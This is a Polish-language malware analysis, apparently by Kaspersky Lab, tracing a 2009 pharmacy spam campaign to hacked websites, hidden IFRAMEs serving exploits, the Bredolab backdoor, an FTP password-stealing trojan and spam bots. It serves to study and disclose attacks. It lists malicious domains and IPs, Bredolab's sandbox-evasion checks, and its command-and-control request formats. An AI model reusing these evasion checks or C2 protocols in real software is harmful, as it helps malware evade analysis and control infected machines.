Fabryka pieni臋dzy

Artyku艂 ten stanowi analiz臋 jednej wiadomo艣ci spamowej i przedstawia metody stosowane dzisiaj przez cyberprzest臋pc贸w w celu tworzenia botnet贸w i przeprowadzania masowych wysy艂ek spamowych. Opisane metody i techniki s膮 bez w膮tpienia nielegalne, a cyberprzest臋pcy wykorzystuj膮 je w jednym celu: aby si臋 wzbogaci膰.

Spam

Na pocz膮tku lata 2009 roku laboratorium filtrowania zawarto艣ci firmy Kaspersky Lab zacz臋艂o otrzymywa膰 e-maile, kt贸re na pierwszy rzut oka wydawa艂y si臋 typowymi wiadomo艣ciami spamowymi. E-maile promowa艂y leki i wykorzystywa艂y standardowy format, kt贸ry zawiera艂 HTML oraz osadzone obrazy:


Przyk艂ad spamu wys艂anego do webmaster@viruslist.com

Jednak wiadomo艣ci te posiada艂y jedn膮 cech臋, kt贸ra wyr贸偶nia艂a je na tle innego spamu. Zawarte w nich odsy艂acze nie prowadzi艂y do stron spamer贸w, ale stron HTML-owych na legalnych portalach.

Domeny w odsy艂aczach r贸偶ni艂y si臋 w zale偶no艣ci od wiadomo艣ci, jednak 艣cie偶ka do serwera by艂a zawsze taka sama: "1/2/3/4/buy.html."

 ????? ????
Tekst 藕r贸d艂owy e-maila zawieraj膮cego odsy艂acze do legalnych stron internetowych

Wszystkie strony, do kt贸rych prowadzi艂y odsy艂acze, zawiera艂y jednowierszowy plik HTML ze znacznikiem META refresh. Znacznik ten by艂 wykorzystywany do przekierowywania u偶ytkownika na inn膮 stron臋 - w tym przypadku, sklep internetowy sprzedaj膮cy leki reklamowane przez spamer贸w.


Tekst 藕r贸d艂owy stron internetowych, kt贸re przekierowuj膮 u偶ytkownik贸w na stron臋 spamersk膮

 ????? ????
Strona, na jak膮 zostali przekierowani u偶ytkownicy

Jedn膮 z metod wykorzystywanych do wykrywania spamu jest czarna lista nazw domen, do kt贸rych prowadz膮 odsy艂acze w wiadomo艣ciach spamowych. Pozwala to wykrywa膰 wszystkie wiadomo艣ci wysy艂ane w masowych wysy艂kach, niezale偶nie od tekstu w tre艣ci wiadomo艣ci. Jednak w tym przypadku, domeny, do kt贸rych prowadzi艂y odsy艂acze w wiadomo艣ci, nie mog艂y zosta膰 umieszczone na czarnej li艣cie, poniewa偶 odsy艂acze prowadzi艂y do legalnych stron internetowych. Co wi臋cej, ka偶dego dnia nasi analitycy identyfikowali kolejnych 10 nowych domen. Ta metoda obchodzenia filtr贸w spamowych znana jest spamerom od wielu lat, jest jednak rzadko wykorzystywana, poniewa偶 wi膮偶e si臋 z wy偶szymi kosztami ni偶 zakup nowych domen.

Strony internetowe, do kt贸rych prowadzi艂y odsy艂acze, zosta艂y prawdopodobnie zhakowane i by艂y wykorzystywane przez cyberprzest臋pc贸w do przekierowywania u偶ytkownik贸w na strony spamer贸w. Wci膮偶 jednak nie wiedzieli艣my, w jaki spos贸b cyberprzest臋pcy zdo艂ali w艂ama膰 si臋 na tak wiele stron.

Strony internetowe

W艂amanie si臋 przy u偶yciu standardowych metod nie by艂oby mo偶liwe w przypadku wi臋kszo艣ci z tych stron. Szybka analiza zhakowanych zasob贸w nie ujawni艂a 偶adnych wsp贸lnych luk w zabezpieczeniach. Do stworzenia tych stron nie wykorzystano r贸wnie偶 tych samych technologii itd. Ponadto, wi臋kszo艣膰 z nich nie zawiera艂a 偶adnych skrypt贸w, a jedynie HTML. Jedyn膮 rzecz膮, jaka je 艂膮czy艂a, by艂 folder zawieraj膮cy plik "buy.html". Zawiera艂 on znacznik HTML, kt贸ry przekierowywa艂 u偶ytkownik贸w do sklepu internetowego spamer贸w, w kt贸rym sprzedawane by艂y lekarstwa.

Jednak dog艂臋bna analiza jednej ze zhakowanych stron ujawni艂a dobrze ukryt膮 ramk臋 IFRAME, kt贸ra przekierowywa艂a do strony o nazwie b9g.ru. Podzia艂a艂o to jak 艣wiate艂ko ostrzegawcze: IFRAME odsy艂aj膮cy do podejrzanych stron internetowych jest cz臋sto wykorzystywany przez cyberprzest臋pc贸w do infekowania komputer贸w przy u偶yciu exploit贸w.

 ????? ????
Zhakowana strona

Analiza ujawni艂a, 偶e b9g.ru znajduje si臋 pod pi臋cioma r贸偶nymi adresami IP:

77.37.20.130
90.156.144.78
77.37.19.173
77.37.19.179
oraz 77.37.19.205.

Po zebraniu informacji o domenach, kt贸re r贸wnie偶 zosta艂y zarejestrowane pod tymi adresami, zdo艂ali艣my zidentyfikowa膰 domeny, gdzie adresy by艂y wykorzystywane do umieszczenia ramki IFRAME na zhakowanych stronach: a31.ru, b5r.ru, b5z.ru, b7p.ru, b8o.ru, b9g.ru, c6y.ru, c8k.at, f5l.at, f5x.at itd. Potwierdzi艂o to nasze podejrzenia odno艣nie zagro偶enia, jakie stanowi ramka IFRAME wykryta na zhakowanej stronie.

Exploity

Kolejnym krokiem by艂o zidentyfikowanie, jakie programy by艂y pobierane na komputery u偶ytkownik贸w ze strony http://b9g.ru:****/*****.php. Tak jak si臋 spodziewali艣my, ju偶 po pierwszym odwiedzeniu tej strony na nasz komputer zosta艂y pobrane exploity wraz z index.php. Cyberprzest臋pcy wykorzystali szereg r贸偶nych luk w zabezpieczeniach oprogramowania; najwi臋ksze zagro偶enie stanowi艂y exploity wykorzystuj膮ce luki w zabezpieczeniach PDF.

 ????? ????

 ????? ????
Zaszyfrowany i niezaszyfrowany index.php

Bot

Dzi臋ki wykorzystaniu luk w zabezpieczeniach pobrany zosta艂 program Backdoor.Win32.Bredolab. Szkodnik ten wykorzystuje technologie rootkit, pobiera i instaluje inne szkodliwe programy.

 ????? ????
Fragment zrzutu zawarto艣ci pami臋ci rootkita downloadera

Bredolab przeciwdzia艂a pr贸bom uruchomienia go w piaskownicy, sprawdzaj膮c, czy istnieje

  • Nazwa u偶ytkownika, taka jak: USER, user, CurrentUser, Sandbox;
  • Nazwa komputera SANDBOX;
  • Ci膮g VBOX w HKLM\HARDWARE\Description\System\SystemBiosVersion
  • Nast臋puj膮ce warto艣ci w kluczu ProductID w HKLM\Microsoft\Windows\CurrentVersion:
    • 55274-640-2673064-23950 (JoeBox)
    • 76487-644-3177037-23510 (CWSandbox)
    • 76487-337-8429955-22614 (Anubis)

Je偶eli jeden z tych warunk贸w zostanie spe艂niony, szkodliwy program przestanie dzia艂a膰.

Bredolab przestaje r贸wnie偶 dzia艂a膰, je偶eli na zainfekowanym komputerze jest zainstalowany COMODO Firewall.

W przeciwnym razie Bredolab kopiuje si臋 do %Temp%\~TM27FB4A.TMP, wstrzykuje sw贸j kod do explorer.exe, uruchamia nowy w膮tek i przenosi si臋 do %Temp%\~TM%TempName%. Nast臋pnie bot uruchamia si臋 w tym w膮tku, a pierwotny proces zostaje zako艅czony.

Po tym, jak bot skutecznie po艂膮czy si臋 z centrum kontroli, wysy艂a 偶膮danie GET:

GET /l/controller.php?action=bot&entity_list={liczby oddzielone przecinkami &uid=11&first={0|1}&guid={VolumeSerialNumber} &uid=11&first={0|1}&guid={VolumeSerialNumber}&rnd=6293712

W odpowiedzi serwer przekazuje zaszyfrowane programy do bota. Programy te mog膮 nast臋pnie zosta膰 zapisane do nowego pliku, %Windows%\Temp\wpv%rand_number%.exe, kt贸ry jest nast臋pnie uruchamiany, lub do nowo stworzonego procesu svchost.

 ????? ????
Przyk艂ad zaszyfrowanej wiadomo艣ci z centrum kontroli

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Jul 2009 17:08:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Version: 1
Content-Length: 55709
Entity-Info: 1241530597:32768:1;1246898982:22941:2;
Rnd: 982101
Magic-Number:
32|1|187:55:66:132:143:54:243:114:97:146:132:5:192:141:199:113:160:130:101:
167:50:61:32:107:127:128:84:144:169:61:158:100:...

Odpowied藕 centrum kontroli. Klucz deszyfruj膮cy znajduje si臋 w polu Magic Number.

Bot informuje w艂a艣ciciela botnetu o swoich dzia艂aniach, wysy艂aj膮c 偶膮danie GET:
GET /l/controller.php?action=report&guid=0&rnd=6293712&uid=11& entity={number:unique_start|
unique_failed|repeat_start|repeat_failed;number:...}

Trojany kradn膮ce has艂a

Po tym, jak bot po艂膮czy si臋 z centrum kontroli, zainfekowany system pobiera i instaluje program o nazwie Trojan-PSW.Win32.Agent.mzh. Szkodnik ten kradnie has艂a do klient贸w FTP.

 ????? ????
Odszyfrowany kod trojana kradn膮cego has艂a do klienta FTP

Skradzione has艂a do klienta FTP s膮 nast臋pnie wysy艂ane na nast臋puj膮cy adres:

 ????? ????
Lokalizacja serwera, na kt贸ry s膮 wysy艂ane skradzione has艂a

Sytuacja by艂a jasna. Cyberprzest臋pcy nie pr贸bowali w艂amywa膰 si臋 na strony internetowe przy u偶yciu wstrzykiwania SQL lub exploit贸w atakuj膮cych silniki stron - zamiast tego kradli po prostu has艂a do klient贸w FTP w celu przej臋cia kontroli nad zawarto艣ci膮 stron.

Wed艂ug informacji o trojanie Trojan-PSW.Win32.Agent.mzh zamieszczonych na forach dla haker贸w, wynaleziono system umo偶liwiaj膮cy kradzie偶 hase艂 do stron; trojan ten stanowi艂 cz臋艣膰 tego systemu, kt贸ry mo偶na by艂o kupi膰 za 2 000 dolar贸w.

Pobieranie innych szkodliwych program贸w

Tydzie艅 p贸藕niej, centrum kontroli botnetu wyda艂o polecenie pobrania bot贸w w celu wysy艂ania spamu: w艣r贸d bot贸w znajdowa艂y si臋 tak znane szkodniki, jak Rustock (Backdoor.Win32.HareBot) i Pushdo (Backdoor.Win32.NewRest.aq).

Po up艂ywie kolejnego tygodnia na zainfekowanych maszynach zosta艂y zainstalowane r贸wnie偶 programy z rodziny Koobface oraz fa艂szywy program antywirusowy.

Plan ataku

Niewielkie badanie, kt贸re rozpocz臋艂o si臋 od spamu wys艂anego na adres webmaster@viruslist.com, ujawni艂o, w jaki spos贸b dzia艂aj膮 cyberprzest臋pcy:

 ????? ????
Etapy w艂amywania si臋 na strony internetowe i przeprowadzania masowych wysy艂ek spamowych

System ten pokazuje technologie i techniki cz臋sto stosowane do tworzenia botnet贸w wykorzystywanych do wysy艂ania masowych wysy艂ek spamowych:

  1. W艂amanie si臋 do legalnych zasob贸w.
  2. Umieszczenie na zhakowanych portalach stron, kt贸re przekierowuj膮 do stron spamer贸w.
  3. Umieszczenie na zhakowanych portalach odsy艂aczy do exploit贸w.
  4. Tworzenie botnetu z komputer贸w, kt贸re zosta艂y zainfekowane w wyniku odwiedzenia zhakowanych stron.
  5. Kradzie偶 hase艂 u偶ytkownik贸w do stron internetowych.
  6. Pobieranie bot贸w spamowych w celu przeprowadzania masowych wysy艂ek i innych szkodliwych program贸w na komputery w botnecie.
Metody te zapewniaj膮 p艂ynne dzia艂anie procesu, kt贸ry w idealnym 艣wiecie cyberprzest臋pczym jest cykliczny.

Wnioski

Wysy艂anie spamu zawieraj膮cego odsy艂acze do zhakowanych i zainfekowanych stron internetowych jest powszechn膮 praktyk膮. Co godzin臋 identyfikujemy dziesi膮tki nowych adres贸w tego typu.


Przyk艂ad wiadomo艣ci e-mail zawieraj膮cej odsy艂acz do strony na zhakowanym portalu internetowym

 ????? ????
Tekst 藕r贸d艂owy sekcji HTML-owej e-maila

Odsy艂acz (http://.../1.html) wskazuje na stron臋 na zhakowanym portalu internetowym, kt贸ra zawiera znacznik przekierowuj膮cy do sklepu internetowego sprzedaj膮cego lekarstwa.

Spamerzy stosuj膮 tego rodzaju taktyki w wielu r贸偶nych wiadomo艣ciach e-mail, zmieniaj膮c nazw臋 strony, do kt贸rej s膮 przekierowywani u偶ytkownicy i dostarczaj膮c szereg r贸偶nych exploit贸w przy u偶yciu IFRAME. Jednak g艂贸wny cel jest zawsze taki sam: wszystkie stosowane technologie s膮 wykorzystywane do zarabiania pieni臋dzy.

I jeszcze jedno...

W lipcu tego roku pojawi艂y si臋 informacje o w艂amaniu si臋 na stron臋 Torrentreactor. Cyberprzest臋pcy wykorzystali znaczniki, kt贸re przekierowywa艂y do strony zawieraj膮cej exploity; by艂o jasne, 偶e do w艂amania si臋 wykorzystano szkodliwy program stworzony w celu kradzie偶y hase艂 do FTP-a.

 ????? ????
Fragment zhakowanej strony Torrentreactor.net

Jest to kolejny przyk艂ad wielu podobnych przypadk贸w w艂ama艅 hakerskich.

殴r贸d艂o:
Kaspersky Lab